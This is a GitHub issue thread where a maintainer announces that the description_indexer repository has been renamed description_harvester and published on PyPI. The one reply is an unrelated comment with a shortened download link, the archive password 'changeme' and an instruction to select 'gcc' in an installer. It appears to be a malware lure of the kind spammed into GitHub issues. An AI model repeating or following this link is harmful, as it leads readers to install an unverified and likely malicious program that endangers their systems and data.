### ISSUE TITLE
Change description_indexer to description_harvester

### ISSUE THREAD

**Issue by gwiedeman** [UAlbanyArchives/description_indexer#1]
[https://github.com/UAlbanyArchives/description_indexer](https://github.com/UAlbanyArchives/description_indexer) is now [https://github.com/UAlbanyArchives/description_harvester](https://github.com/UAlbanyArchives/description_harvester)
and the [package is available](https://pypi.org/project/description-harvester/) with `pip install description-harvester` 🎉

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
